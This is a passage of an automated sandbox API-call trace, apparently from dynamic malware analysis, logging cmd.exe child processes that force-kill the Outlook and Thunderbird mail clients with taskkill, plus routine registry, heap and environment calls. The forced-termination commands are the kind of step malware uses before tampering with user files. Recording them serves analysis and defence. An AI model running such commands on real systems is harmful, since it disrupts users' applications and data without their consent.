dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3ef0cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im outlook.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3ef118 | out: lpCommandLine="taskkill /f /im outlook.exe", lpProcessInformation=0x3ef118*(hProcess=0x78, hThread=0x74, dwProcessId=0x6d0, dwThreadId=0x41c)) returned 1 [0060.972] CloseHandle (hObject=0x74) returned 1 [0060.973] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0060.973] GetProcessHeap () returned 0x460000 [0060.973] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475f08 | out: hHeap=0x460000) returned 1 [0060.973] GetEnvironmentStringsW () returned 0x475f08* [0060.973] GetProcessHeap () returned 0x460000 [0060.973] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb36) returned 0x4740c8 [0060.973] FreeEnvironmentStringsW (penv=0x475f08) returned 1 [0060.973] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0071.024] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3ef00c | out: lpExitCode=0x3ef00c*=0x80) returned 1 [0071.024] CloseHandle (hObject=0x78) returned 1 [0071.024] _vsnwprintf (in: _Buffer=0x3ef154, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ef018 | out: _Buffer="00000080") returned 8 [0071.024] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0071.024] GetProcessHeap () returned 0x460000 [0071.024] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4740c8 | out: hHeap=0x460000) returned 1 [0071.024] GetEnvironmentStringsW () returned 0x4740c8* [0071.025] GetProcessHeap () returned 0x460000 [0071.025] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4795b0 [0071.025] FreeEnvironmentStringsW (penv=0x4740c8) returned 1 [0071.025] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0071.025] GetProcessHeap () returned 0x460000 [0071.025] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4795b0 | out: hHeap=0x460000) returned 1 [0071.025] GetEnvironmentStringsW () returned 0x4740c8* [0071.025] GetProcessHeap () returned 0x460000 [0071.025] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4795b0 [0071.025] FreeEnvironmentStringsW (penv=0x4740c8) returned 1 [0071.025] GetProcessHeap () returned 0x460000 [0071.025] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46ff18 | out: hHeap=0x460000) returned 1 [0071.025] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ef070 | out: lpAttributeList=0x3ef070) [0071.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.025] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.025] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0071.025] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.025] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0071.026] SetConsoleInputExeNameW () returned 0x1 [0071.026] GetConsoleOutputCP () returned 0x1b5 [0071.026] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0071.026] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.026] exit (_Code=128) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1cb45000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im thunderbird.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0xb7c [0060.429] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27fd2c | out: lpSystemTimeAsFileTime=0x27fd2c*(dwLowDateTime=0x93f49950, dwHighDateTime=0x1d57b18)) [0060.429] GetCurrentProcessId () returned 0xb78 [0060.429] GetCurrentThreadId () returned 0xb7c [0060.429] GetTickCount () returned 0x1149924 [0060.429] QueryPerformanceCounter (in: lpPerformanceCount=0x27fd24 | out: lpPerformanceCount=0x27fd24*=18065029269) returned 1 [0060.430] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0060.430] __set_app_type (_Type=0x1) [0060.430] __p__fmode () returned 0x74eb31f4 [0060.430] __p__commode () returned 0x74eb31fc [0060.430] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0060.431] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0060.431] GetCurrentThreadId () returned 0xb7c [0060.431] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb7c) returned 0x60 [0060.431] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.431] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0060.431] SetThreadUILanguage (LangId=0x0) returned 0x409 [0060.431] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.431] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27fcbc | out: phkResult=0x27fcbc*=0x0) returned 0x2 [0060.432] VirtualQuery (in: lpAddress=0x27fcf3, lpBuffer=0x27fc8c, dwLength=0x1c | out: lpBuffer=0x27fc8c*(BaseAddress=0x27f000, AllocationBase=0x180000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.432] VirtualQuery (in: lpAddress=0x180000, lpBuffer=0x27fc8c, dwLength=0x1c | out: lpBuffer=0x27fc8c*(BaseAddress=0x180000, AllocationBase=0x180000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0060.432] VirtualQuery (in: lpAddress=0x181000, lpBuffer=0x27fc8c, dwLength=0x1c | out: lpBuffer=0x27fc8c*(BaseAddress=0x181000, AllocationBase=0x180000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0060.432] VirtualQuery (in: lpAddress=0x183000, lpBuffer=0x27fc8c, dwLength=0x1c | out: lpBuffer=0x27fc8c*(BaseAddress=0x183000, AllocationBase=0x180000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.432] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x27fc8c, dwLength=0x1c | out: lpBuffer=0x27fc8c*(BaseAddress=0x280000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0060.432] GetConsoleOutputCP () returned 0x1b5 [0060.432] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.432] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0060.432] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.432] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0060.432] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.432] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0060.432] _get_osfhandle (_FileHandle=1) returned 0x7 [0060.432] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0060.433] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.433] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0060.433] _get_osfhandle (_FileHandle=0) returned 0x3 [0060.433] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0060.433] GetEnvironmentStringsW () returned 0x292050* [0060.433] GetProcessHeap () returned 0x280000 [0060.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xaca) returned 0x292b28 [0060.433] FreeEnvironmentStringsW (penv=0x292050) returned 1 [0060.433] GetProcessHeap () returned 0x280000 [0060.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x290c88 [0060.434] GetEnvironmentStringsW () returned 0x292050* [0060.434] GetProcessHeap () returned 0x280000 [0060.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xaca) returned 0x293600 [0060.434] FreeEnvironmentStringsW (penv=0x292050) returned 1 [0060.434] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x27ec2c | out: phkResult=0x27ec2c*=0x68) returned 0x0 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x0, lpData=0x27ec38*=0x0, lpcbData=0x27ec30*=0x1000) returned 0x2 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x4, lpData=0x27ec38*=0x1, lpcbData=0x27ec30*=0x4) returned 0x0 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x0, lpData=0x27ec38*=0x1, lpcbData=0x27ec30*=0x1000) returned 0x2 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x4, lpData=0x27ec38*=0x0, lpcbData=0x27ec30*=0x4) returned 0x0 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x4, lpData=0x27ec38*=0x40, lpcbData=0x27ec30*=0x4) returned 0x0 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x4, lpData=0x27ec38*=0x40, lpcbData=0x27ec30*=0x4) returned 0x0 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x0, lpData=0x27ec38*=0x40, lpcbData=0x27ec30*=0x1000) returned 0x2 [0060.434] RegCloseKey (hKey=0x68) returned 0x0 [0060.434] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x27ec2c | out: phkResult=0x27ec2c*=0x68) returned 0x0 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x0, lpData=0x27ec38*=0x40, lpcbData=0x27ec30*=0x1000) returned 0x2 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x4, lpData=0x27ec38*=0x1, lpcbData=0x27ec30*=0x4) returned 0x0 [0060.434] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x0, lpData=0x27ec38*=0x1, lpcbData=0x27ec30*=0x1000) returned 0x2 [0060.435] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x4, lpData=0x27ec38*=0x0, lpcbData=0x27ec30*=0x4) returned 0x0 [0060.435] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x4, lpData=0x27ec38*=0x9, lpcbData=0x27ec30*=0x4) returned 0x0 [0060.435] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x4, lpData=0x27ec38*=0x9, lpcbData=0x27ec30*=0x4) returned 0x0 [0060.435] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x27ec34, lpData=0x27ec38, lpcbData=0x27ec30*=0x1000 | out: lpType=0x27ec34*=0x0, lpData=0x27ec38*=0x9, lpcbData=0x27ec30*=0x1000) returned 0x2 [0060.435] RegCloseKey (hKey=0x68) returned 0x0 [0060.435] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebac [0060.435] srand (_Seed=0x5d97ebac) [0060.435] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im thunderbird.exe" [0060.435] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im thunderbird.exe" [0060.435] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.435] GetProcessHeap () returned 0x280000 [0060.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x210) returned 0x292050 [0060.435] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x292058, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0060.435] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.435] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.435] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.435] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.436] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.436] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.436] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.436] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.436] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.436] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.436] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.436] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.436] GetProcessHeap () returned 0x280000 [0060.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x292b28 | out: hHeap=0x280000) returned 1 [0060.436] GetEnvironmentStringsW () returned 0x292268* [0060.436] GetProcessHeap () returned 0x280000 [0060.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xae2) returned 0x294bc8 [0060.436] FreeEnvironmentStringsW (penv=0x292268) returned 1 [0060.436] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0060.436] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.436] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.436] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.436] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.436] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.436] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.436] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.436] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.436] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.436] GetProcessHeap () returned 0x280000 [0060.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x54) returned 0x2956b8 [0060.436] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x27f9f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.436] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x27f9f8, lpFilePart=0x27f9f4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x27f9f4*="Desktop") returned 0x25 [0060.437] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.437] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x27f774 | out: lpFindFileData=0x27f774*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x291ed0 [0060.437] FindClose (in: hFindFile=0x291ed0 | out: hFindFile=0x291ed0) returned 1 [0060.437] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x27f774 | out: lpFindFileData=0x27f774*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x291ed0 [0060.437] FindClose (in: hFindFile=0x291ed0 | out: hFindFile=0x291ed0) returned 1 [0060.437] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0060.437] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x27f774 | out: lpFindFileData=0x27f774*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x291ed0 [0060.437] FindClose (in: hFindFile=0x291ed0 | out: hFindFile=0x291ed0) returned 1 [0060.437] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.437] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0060.437] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0060.437] GetProcessHeap () returned 0x280000 [0060.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294bc8 | out: hHeap=0x280000) returned 1 [0060.437] GetEnvironmentStringsW () returned 0x2940d8* [0060.437] GetProcessHeap () returned 0x280000 [0060.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb36) returned 0x295f18 [0060.438] FreeEnvironmentStringsW (penv=0x2940d8) returned 1 [0060.438] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.438] GetProcessHeap () returned 0x280000 [0060.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2956b8 | out: hHeap=0x280000) returned 1 [0060.438] GetProcessHeap () returned 0x280000 [0060.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x400e) returned 0x296a58 [0060.438] GetProcessHeap () returned 0x280000 [0060.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4c) returned 0x292da8 [0060.438] GetProcessHeap () returned 0x280000 [0060.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58 | out: hHeap=0x280000) returned 1 [0060.438] GetConsoleOutputCP () returned 0x1b5 [0060.705] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.705] GetUserDefaultLCID () returned 0x409 [0060.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0060.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x27fb38, cchData=128 | out: lpLCData="0") returned 2 [0060.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x27fb38, cchData=128 | out: lpLCData="0") returned 2 [0060.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x27fb38, cchData=128 | out: lpLCData="1") returned 2 [0060.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0060.706] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0060.707] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0060.707] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0060.707] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0060.707] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0060.707] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0060.707] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0060.707] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0060.707] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0060.707] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0060.708] GetProcessHeap () returned 0x280000 [0060.708] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20c) returned 0x292e00 [0060.708] GetConsoleTitleW (in: lpConsoleTitle=0x292e00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.708] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.708] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0060.708] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0060.708] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0060.709] GetProcessHeap () returned 0x280000 [0060.709] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x400a) returned 0x296a58 [0060.709] GetProcessHeap () returned 0x280000 [0060.709] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x296a58 | out: hHeap=0x280000) returned 1 [0060.709] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0060.709] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0060.709] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0060.709] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0060.709] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0060.709] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0060.709] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0060.709] GetProcessHeap () returned 0x280000 [0060.710] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x58) returned 0x293018 [0060.710] GetProcessHeap () returned 0x280000 [0060.710] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1a) returned 0x295758 [0060.710] GetProcessHeap () returned 0x280000 [0060.710] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x38) returned 0x293078 [0060.711] GetConsoleTitleW (in: lpConsoleTitle=0x27f830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.711] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.711] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.711] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.711] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.711] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.711] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.711] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.712] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.712] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.712] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.712] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.712] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.712] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.712] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.712] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.712] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.712] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.712] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.712] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.712] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.712] _wcsicmp (_String1="taskkill", _String2="GOTO") 